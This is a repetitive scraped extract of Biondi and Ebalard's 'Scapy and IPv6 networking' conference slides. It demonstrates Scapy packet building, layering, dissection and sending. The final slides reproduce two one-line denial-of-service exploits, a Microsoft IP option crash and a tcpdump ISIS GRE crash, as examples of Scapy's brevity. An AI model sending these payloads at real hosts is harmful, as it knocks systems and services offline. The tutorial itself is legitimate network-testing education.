You know ISAKMP and tracerouting
=⇒ you can traceroute to VPN concentrators
P. Biondi / A. Ebalard Scapy and IPv6 networking 23/100
![Page 36: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/36.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Probe once, interpret many
Main difference with other tools :
The result of a probe is made of
the list of couples (packet sent, packet received)the list of unreplied packet
Interpretation/representation of the result is doneindependently
=⇒ you can refine an interpretation without needing a new probe
Example
You do a TCP scan on an host and see some open ports, aclosed one, and no answer for the others
=⇒ you don’t need a new probe to check the TTL or the IPID ofthe answers and determine whether it was the same box
P. Biondi / A. Ebalard Scapy and IPv6 networking 24/100
![Page 37: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/37.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Probe once, interpret manyThe sr*() functions
sr()
match
netw
ork
Implicit packet set
Result
Unanswered packets
stimulus
response
P. Biondi / A. Ebalard Scapy and IPv6 networking 25/100
![Page 38: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/38.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Outline
1 Introduction to the network testing tools world
2 The Scapy ConceptConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
3 Scapy + IPv6 = Scapy6IPv6Scapy6 capabilitiesICMPv6 Support
4 Fun Security with Scapy6Playing with Routing HeadersQuick OS support summary
5 Conclusion
P. Biondi / A. Ebalard Scapy and IPv6 networking 26/100
![Page 39: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/39.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Packet manipulationFirst steps
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 27/100
![Page 40: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/40.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Packet manipulationFirst steps
>>> a=IP(ttl=10)
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 27/100
![Page 41: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/41.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Packet manipulationFirst steps
>>> a=IP(ttl=10)
>>> a
< IP ttl=10 |>
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 27/100
![Page 42: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/42.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Packet manipulationFirst steps
>>> a=IP(ttl=10)
>>> a
< IP ttl=10 |>
>>> a.src
’127.0.0.1’
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 27/100
![Page 43: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/43.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Packet manipulationFirst steps
>>> a=IP(ttl=10)
>>> a
< IP ttl=10 |>
>>> a.src
’127.0.0.1’
>>> a.dst="192.168.1.1"
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 27/100
![Page 44: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/44.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Packet manipulationFirst steps
>>> a=IP(ttl=10)
>>> a
< IP ttl=10 |>
>>> a.src
’127.0.0.1’
>>> a.dst="192.168.1.1"
>>> a
< IP ttl=10 dst=192.168.1.1 |>
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 27/100
![Page 45: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/45.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Packet manipulationFirst steps
>>> a=IP(ttl=10)
>>> a
< IP ttl=10 |>
>>> a.src
’127.0.0.1’
>>> a.dst="192.168.1.1"
>>> a
< IP ttl=10 dst=192.168.1.1 |>
>>> a.src
’192.168.8.14’
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 27/100
![Page 46: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/46.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Packet manipulationFirst steps
>>> a=IP(ttl=10)
>>> a
< IP ttl=10 |>
>>> a.src
’127.0.0.1’
>>> a.dst="192.168.1.1"
>>> a
< IP ttl=10 dst=192.168.1.1 |>
>>> a.src
’192.168.8.14’
>>> del(a.ttl)
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 27/100
![Page 47: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/47.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Packet manipulationFirst steps
>>> a=IP(ttl=10)
>>> a
< IP ttl=10 |>
>>> a.src
’127.0.0.1’
>>> a.dst="192.168.1.1"
>>> a
< IP ttl=10 dst=192.168.1.1 |>
>>> a.src
’192.168.8.14’
>>> del(a.ttl)
>>> a
< IP dst=192.168.1.1 |>
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 27/100
![Page 48: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/48.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Packet manipulationFirst steps
>>> a=IP(ttl=10)
>>> a
< IP ttl=10 |>
>>> a.src
’127.0.0.1’
>>> a.dst="192.168.1.1"
>>> a
< IP ttl=10 dst=192.168.1.1 |>
>>> a.src
’192.168.8.14’
>>> del(a.ttl)
>>> a
< IP dst=192.168.1.1 |>
>>> a.ttl
64
P. Biondi / A. Ebalard Scapy and IPv6 networking 27/100
![Page 49: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/49.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Packet manipulationStacking
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 28/100
![Page 50: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/50.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Packet manipulationStacking
>>> b=a/TCP(flags="SF")
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 28/100
![Page 51: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/51.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Packet manipulationStacking
>>> b=a/TCP(flags="SF")
>>> b
< IP proto=TCP dst=192.168.1.1 |
< TCP flags=FS |>>
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 28/100
![Page 52: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/52.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Packet manipulationStacking
>>> b=a/TCP(flags="SF")
>>> b
< IP proto=TCP dst=192.168.1.1 |
< TCP flags=FS |>>
>>> b.command()
"IP(dst=’192.168.1.1’)/TCP(flags=3)"
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 28/100
![Page 53: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/53.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Packet manipulationStacking
>>> b=a/TCP(flags="SF")
>>> b
< IP proto=TCP dst=192.168.1.1 |
< TCP flags=FS |>>
>>> b.command()
"IP(dst=’192.168.1.1’)/TCP(flags=3)"
>>> b.show()---[ IP ]---
version = 4
ihl = 0
tos = 0x0
len = 0
id = 1
flags =
frag = 0
ttl = 64
proto = TCP
chksum = 0x0
src = 192.168.8.14
dst = 192.168.1.1
options = ’’
---[ TCP ]---
sport = 20
dport = 80
seq = 0
ack = 0
dataofs = 0
reserved = 0
flags = FS
window = 0
chksum = 0x0
urgptr = 0
options =
P. Biondi / A. Ebalard Scapy and IPv6 networking 28/100
![Page 54: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/54.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Packet ManipulationNavigation between layers
Layers of a packet can be accessed using the payload attribute :
p r i n t pkt . pay load . pay load . pay load . chksum
A better way :
The idiom Layer in packet tests the presence of a layer
The idiom packet[Layer] returns the asked layer
The idiom packet[Layer:3] returns the third instance of theasked layer
Example
i f UDP in pkt :p r i n t pkt [UDP ] . chksum
The code is independant from lower layers. It will work the samewhether pkt comes from PPP or from WEP with 802.1q
P. Biondi / A. Ebalard Scapy and IPv6 networking 29/100
![Page 55: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/55.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Packet ManipulationBuilding and Dissecting
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 30/100
![Page 56: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/56.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Packet ManipulationBuilding and Dissecting
>>> str(b)
’E\x00\x00(\x00\x01\x00\x00@\x06\xf0o\xc0\xa8\x08\x0e\xc0\xa8\x0
1\x01\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00P\x03\x00\x00%
\x1e\x00\x00’
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 30/100
![Page 57: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/57.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Packet ManipulationBuilding and Dissecting
>>> str(b)
’E\x00\x00(\x00\x01\x00\x00@\x06\xf0o\xc0\xa8\x08\x0e\xc0\xa8\x0
1\x01\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00P\x03\x00\x00%
\x1e\x00\x00’
>>> IP( )
< IP version=4L ihl=5L tos=0x0 len=40 id=1 flags= frag=0L ttl=64
proto=TCP chksum=0xf06f src=192.168.8.14 dst=192.168.1.1
options=’’ |< TCP sport=20 dport=80 seq=0L ack=0L dataofs=5L
reserved=16L flags=FS window=0 chksum=0x251e urgptr=0 |>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 30/100
![Page 58: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/58.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Packet ManipulationImplicit Packets
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 31/100
![Page 59: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/59.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Packet ManipulationImplicit Packets
>>> b.ttl=(10,14)
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 31/100
![Page 60: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/60.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Packet ManipulationImplicit Packets
>>> b.ttl=(10,14)
>>> b.payload.dport=[80,443]
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 31/100
![Page 61: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/61.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Packet ManipulationImplicit Packets
>>> b.ttl=(10,14)
>>> b.payload.dport=[80,443]
>>> [k for k in b][< IP ttl=10 proto=TCP dst=192.168.1.1 |< TCP dport=80 flags=FS |>>,
< IP ttl=10 proto=TCP dst=192.168.1.1 |< TCP dport=443 flags=FS |>>,
< IP ttl=11 proto=TCP dst=192.168.1.1 |< TCP dport=80 flags=FS |>>,
< IP ttl=11 proto=TCP dst=192.168.1.1 |< TCP dport=443 flags=FS |>>,
< IP ttl=12 proto=TCP dst=192.168.1.1 |< TCP dport=80 flags=FS |>>,
< IP ttl=12 proto=TCP dst=192.168.1.1 |< TCP dport=443 flags=FS |>>,
< IP ttl=13 proto=TCP dst=192.168.1.1 |< TCP dport=80 flags=FS |>>,
< IP ttl=13 proto=TCP dst=192.168.1.1 |< TCP dport=443 flags=FS |>>,
< IP ttl=14 proto=TCP dst=192.168.1.1 |< TCP dport=80 flags=FS |>>,
< IP ttl=14 proto=TCP dst=192.168.1.1 |< TCP dport=443 flags=FS |>>]
P. Biondi / A. Ebalard Scapy and IPv6 networking 31/100
![Page 62: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/62.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
PS/PDF packet dump
>>> pkt.psdump()
>>> pkt.pdfdump()
Ethernet00 12 79 3d a3 6a
dst 00:12:79:3d:a3:6a
00 11 43 26 48 7e
src 00:11:43:26:48:7e
08 00
type 0x800
IPversion 4L
45
ihl 5L
00
tos 0x0
00 21
len 33
85 2a
id 34090flags DF
40 00
frag 0L
40
ttl 64
11
proto UDP
3e 81
chksum 0x3e81
ac 10 0f 02
src 172.16.15.2
ac 10
0f fe
dst 172.16.15.254options ”
UDP
81 1c
sport 33052
11 ab
dport 4523
00 0d
len 13
77 3f
chksum 0x773f
Raw
74 6f 74 6f 0a
load ’toto.n’
P. Biondi / A. Ebalard Scapy and IPv6 networking 32/100
![Page 63: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/63.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
The sprintf() method
Thanks to the sprintf() method, you can
make your own summary of a packet
abstract lower layers and focus on what’s interesting
Example
>>> a = IP(dst="192.168.8.1",ttl=12)/UDP(dport=123)
>>> a.sprintf("The source is %IP.src%")
’The source is 192.168.8.14’
“%”, “{” and “}” are special characters
they are replaced by “%%”, “%(” and “%)”
P. Biondi / A. Ebalard Scapy and IPv6 networking 33/100
![Page 64: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/64.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Sending
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 34/100
![Page 65: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/65.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Sending
>>> send(b)
..........
Sent 10 packets.
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 34/100
![Page 66: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/66.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Sending
>>> send(b)
..........
Sent 10 packets.
>>> send(b*3)
..............................
Sent 30 packets.
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 34/100
![Page 67: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/67.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Sending
>>> send(b)
..........
Sent 10 packets.
>>> send(b*3)
..............................
Sent 30 packets.
>>> send(b,inter=0.1,loop=1)
...........................^C
Sent 27 packets.
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 34/100
![Page 68: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/68.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Sending
>>> send(b)
..........
Sent 10 packets.
>>> send(b*3)
..............................
Sent 30 packets.
>>> send(b,inter=0.1,loop=1)
...........................^C
Sent 27 packets.
>>> sendp("I’m travelling on Ethernet ", iface="eth0")
P. Biondi / A. Ebalard Scapy and IPv6 networking 34/100
![Page 69: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/69.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Sending
>>> send(b)
..........
Sent 10 packets.
>>> send(b*3)
..............................
Sent 30 packets.
>>> send(b,inter=0.1,loop=1)
...........................^C
Sent 27 packets.
>>> sendp("I’m travelling on Ethernet ", iface="eth0")
tcpdump output:
01:55:31.522206 61:76:65:6c:6c:69 > 49:27:6d:20:74:72,
ethertype Unknown (0x6e67), length 27:
4927 6d20 7472 6176 656c 6c69 6e67 206f I’m.travelling.o
6e20 4574 6865 726e 6574 20 n.Ethernet.
P. Biondi / A. Ebalard Scapy and IPv6 networking 34/100
![Page 70: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/70.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Sending
Microsoft IP option DoS proof of concept is 115 lines of Ccode (without comments)
P. Biondi / A. Ebalard Scapy and IPv6 networking 35/100
![Page 71: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/71.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Sending
Microsoft IP option DoS proof of concept is 115 lines of Ccode (without comments)
The same with Scapy :
send(IP(dst="target",options="\x02\x27"+"X"*38)/TCP())
P. Biondi / A. Ebalard Scapy and IPv6 networking 35/100
![Page 72: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/72.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Sending
Microsoft IP option DoS proof of concept is 115 lines of Ccode (without comments)
The same with Scapy :
send(IP(dst="target",options="\x02\x27"+"X"*38)/TCP())
tcpdump isis print() Remote Denial of Service Exploit :225 lines
P. Biondi / A. Ebalard Scapy and IPv6 networking 35/100
![Page 73: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/73.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Sending
Microsoft IP option DoS proof of concept is 115 lines of Ccode (without comments)
The same with Scapy :
send(IP(dst="target",options="\x02\x27"+"X"*38)/TCP())
tcpdump isis print() Remote Denial of Service Exploit :225 lines
The same with Scapy :
send( IP(dst="1.1.1.1")/GRE(proto=254)/’\x83\x1b \x01\x06\x12\x01\xff\x07\xff\xff\xff\xff\xff\xff\xff
\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x01\x07 \x00\x00’
)
P. Biondi / A. Ebalard Scapy and IPv6 networking 35/100
